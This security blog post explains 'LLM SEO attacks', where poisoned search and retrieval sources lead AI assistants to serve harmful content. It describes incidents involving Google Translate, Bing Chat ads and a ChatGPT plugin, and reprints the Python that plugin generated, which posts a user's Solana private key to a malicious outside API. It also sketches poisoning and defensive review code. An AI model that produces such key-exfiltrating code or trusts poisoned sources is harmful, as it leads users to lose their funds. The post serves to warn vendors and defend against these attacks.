The "LLM SEO Attack" risk is becoming increasingly severe

AI search is starting to poison the everyday information people rely on

Background

As LLMs have become everyday productivity tools, applications such as AI search are gradually displacing traditional search engines such as Google.

Compared with traditional search products such as Google Search, search products built on large language models bring two significant benefits:

The introduction of external components such as RAG, Knowledge Graph, and Search Plugins greatly alleviates the hallucination problem caused by LLMs' insufficient internal knowledge.

Because LLMs are strong at understanding and generating text, end users no longer have to filter and organize search results themselves, which greatly improves search efficiency.

But as the old saying goes, everything has two sides: light and darkness.

LLM search technology brings efficiency gains, but it also introduces new attack surfaces and risks. Worse, application developers have not yet given these risks sufficient attention.

In this article, I summarize relevant cases from recent years and analyze the underlying security risks, hoping to help more LLM application vendors notice and mitigate them.

Recent "LLM SEO Attack" security incidents





The Google Translate interface used by the Immersive Translation plugin was suspected of being hijacked by gambling websites.

The Google Translate system produces malicious output for Chinese vocabulary.



Microsoft's AI-Powered Bing Chat Ads may lead users to malware-distributing sites.

Malicious ads served inside Microsoft Bing's artificial intelligence (AI) chatbot are being used to distribute malware when searching for popular tools. The findings come from Malwarebytes, which revealed that unsuspecting users can be tricked into visiting booby-trapped sites and installing malware directly from Bing Chat conversations. Introduced by Microsoft in February 2023, Bing Chat is an interactive search experience that's powered by OpenAI's large language model called GPT-4. A month later, the tech giant began exploring placing ads in the conversations. But the move has also opened the doors for threat actors who resort to malvertising tactics and propagate malware.



The user enabled the ChatGPT-Research plugin while using ChatGPT. The plugin pulled in external knowledge from a data source that contained malicious backdoor code, summarized it, and returned generated code examples to the user. The user fully trusted ChatGPT's response, which ultimately led to an unexpected supply chain poisoning attack.

The data source referenced by the ChatGPT Research plugin is https://api.solanaapis.com/pumpfun/buy.

This source matched the keywords "Solana" and "pump.fun", and so became the "corpus" data source that ChatGPT pulled in.
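To make the keyword-matching step concrete, here is a toy sketch of how a page stuffed with the right terms can win retrieval and end up in the model's context. It is not how ChatGPT or any real plugin ranks sources: the scoring function, the corpus, and all names (`keyword_score`, `retrieve`, `official_docs`, `poisoned_page`) are assumptions made up for illustration.

```python
import re
from collections import Counter


def tokenize(text: str) -> list[str]:
    """Lowercase the text and split it into terms, keeping inner dots (pump.fun)."""
    raw = re.findall(r"[a-z0-9.]+", text.lower())
    return [t.strip(".") for t in raw if t.strip(".")]


def keyword_score(query: str, document: str) -> int:
    """Count how often the distinct query terms occur in the document."""
    counts = Counter(tokenize(document))
    return sum(counts[term] for term in set(tokenize(query)))


def retrieve(query: str, corpus: dict[str, str], top_k: int = 1) -> list[str]:
    """Return the names of the top_k documents with the highest keyword score."""
    ranked = sorted(
        corpus,
        key=lambda name: keyword_score(query, corpus[name]),
        reverse=True,
    )
    return ranked[:top_k]


# Hypothetical corpus: one ordinary page and one page stuffed with target keywords.
corpus = {
    "official_docs": "Solana transactions are signed locally. Never share a private key.",
    "poisoned_page": (
        "Solana pump.fun buy API. Best Solana pump.fun bot. "
        "Buy pump.fun tokens on Solana with one POST request."
    ),
}

query = "buy token on Solana pump.fun"
top = retrieve(query, corpus)
context = corpus[top[0]]  # this text would be handed to the LLM as "knowledge"
print(top)  # prints ['poisoned_page']
```

In this toy model the attacker only needs to repeat the terms a victim is likely to search for; nothing in the ranking step asks whether the page is trustworthy.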

Screenshot from: https://github.com/solanaapisdev/moonshot-volume-bot/blob/main/src/buySell.js

Based on the retrieved knowledge, ChatGPT generated code that included calls to the malicious API.

```python
import requests

# API Endpoint
api_url = "https://api.solanaapis.com/pumpfun/buy"

# Replace with your actual private key
private_key = "your_private_key_here"

# Token mint address for HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx
mint_address = "HXTh56cHH97ibiNMEtMyMs6ZPAeqy5E9xxxxx"

# Amount in SOL you wish to spend
amount_in_sol = 0.01  # Example: 0.01 SOL

# Transaction parameters
microlamports = 433000  # Default value
units = 300000  # Default value
slippage = 10  # Example: 10 for 10% slippage

# Payload for the POST request
payload = {
    "private_key": private_key,
    "mint": mint_address,
    "amount": amount_in_sol,
    "microlamports": microlamports,
    "units": units,
    "slippage": slippage
}

try:
    # Send POST request to the API
    response = requests.post(api_url, json=payload)
    response_data = response.json()

    if response.status_code == 200 and response_data.get("status") == "success":
        print(f"Transaction successful! TXID: {response_data.get('txid')}")
    else:
        print(f"Transaction failed: {response_data.get('message', 'Unknown error')}")
except Exception as e:
    print(f"An error occurred: {e}")
```

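The victim fully trusted the code generated by ChatGPT and pasted a real private key into it. Because the script sends private_key in a POST request to api.solanaapis.com, the key was handed to the server behind the malicious API, ultimately resulting in a loss of $2.5k.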
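The incident above follows a recognizable pattern: generated code that handles a secret and also contacts a host nobody has vetted. The following is a minimal sketch of a response review step that flags this pattern before the answer is shown to the user. The allowlist (`TRUSTED_HOSTS`), the hint list (`SECRET_HINTS`), and the function name `review_generated_code` are assumptions for illustration, and a plain substring check like this would produce both false positives and false negatives in practice.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the product has vetted. The entry is a placeholder.
TRUSTED_HOSTS = {"api.example.com"}

# Assumption: identifier fragments that suggest a secret is being handled.
SECRET_HINTS = ("private_key", "secret", "mnemonic", "seed_phrase", "password")

# Matches http(s) URLs up to the first quote, bracket, or whitespace.
URL_PATTERN = re.compile(r"https?://[^\s\"'<>)]+")


def review_generated_code(code: str) -> list[str]:
    """Return warnings for a generated snippet; an empty list means no finding."""
    hosts = {urlparse(url).hostname for url in URL_PATTERN.findall(code)}
    untrusted = sorted(h for h in hosts if h and h not in TRUSTED_HOSTS)
    lowered = code.lower()
    secrets = [hint for hint in SECRET_HINTS if hint in lowered]

    warnings = []
    if untrusted and secrets:
        warnings.append(
            f"Snippet handles {', '.join(secrets)} and contacts unvetted host(s): "
            f"{', '.join(untrusted)}"
        )
    return warnings


# A shortened version of the generated code from the incident.
snippet = '''
api_url = "https://api.solanaapis.com/pumpfun/buy"
payload = {"private_key": private_key}
requests.post(api_url, json=payload)
'''

findings = review_generated_code(snippet)
for warning in findings:
    print(warning)
```

A product could block the response, strip the snippet, or attach the warning to the answer. Which of these is appropriate depends on how sensitive the scenario is.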

What is the difference between a traditional SEO attack and an LLM SEO attack?

SEO pollution is not a new problem. In the era of traditional search engines, SEO pollution and SEO poisoning were already widespread.



But in the era of LLMs, and especially of AI search, the security issues and attack surfaces are changing, and they are changing for the worse.

What does this security issue affect?

Undermines the credibility of AI services

Disrupts the normal user experience and can even cause financial loss

May mislead some users into acquiring harmful knowledge

Pollutes the data that AI search systems rely on

How can LLM SEO attacks be mitigated?

Clean up contaminated training data

Strengthen the protection mechanisms of search and ranking algorithms

Establish a stricter response content review and filtering mechanism

Monitor abnormal output in real time

For highly sensitive scenarios, require a human-in-the-loop secondary confirmation and, where necessary, expose the ranking and relevance-retrieval process so that users can review and approve knowledge sources themselves.
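The last mitigation above can be sketched as a gate between retrieval and generation: when a query looks sensitive, any source outside a vetted set must be approved by the user before it is used. This is only a sketch under stated assumptions. The term list (`SENSITIVE_TERMS`), the allowlist (`VETTED_DOMAINS`), the `Source` type, and the `confirm` callback are all hypothetical names, and a real product would need a far better sensitivity classifier than substring matching.

```python
from dataclasses import dataclass
from typing import Callable
from urllib.parse import urlparse

# Assumptions for illustration only: both collections are placeholders.
SENSITIVE_TERMS = ("private key", "wallet", "transfer", "password", "seed phrase")
VETTED_DOMAINS = {"docs.example.org"}


@dataclass
class Source:
    url: str
    snippet: str


def is_sensitive(query: str) -> bool:
    """Treat a query as sensitive if it mentions any of the listed terms."""
    lowered = query.lower()
    return any(term in lowered for term in SENSITIVE_TERMS)


def needs_confirmation(query: str, source: Source) -> bool:
    """A source needs user approval when the query is sensitive and its domain is unvetted."""
    host = urlparse(source.url).hostname or ""
    return is_sensitive(query) and host not in VETTED_DOMAINS


def select_sources(
    query: str,
    sources: list[Source],
    confirm: Callable[[Source], bool],
) -> list[Source]:
    """Keep sources that need no approval, plus those the user approves via `confirm`."""
    return [
        source
        for source in sources
        if not needs_confirmation(query, source) or confirm(source)
    ]


sources = [
    Source("https://docs.example.org/guide", "Sign transactions locally."),
    Source("https://api.solanaapis.com/pumpfun/buy", "POST your private key to buy."),
]

# Simulated user who rejects every source they are asked about.
kept = select_sources("buy a token with my wallet", sources, confirm=lambda s: False)
print([s.url for s in kept])  # prints ['https://docs.example.org/guide']
```

Passing the decision in as a callback keeps the gate independent of the user interface: the same function works with a chat prompt, a modal dialog, or an automated policy in tests.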

References

https://mp.weixin.qq.com/s/1d5f9EQyV8Mk1OBV2V4DzQ

https://x.com/r_cky0/status/1859656430888026524

https://github.com/solanaapisdev/moonshot-volume-bot/blob/main/src/buySell.js

Microsoft's AI-Powered Bing Chat Ads May Lead Users to Malware-Distributing Sites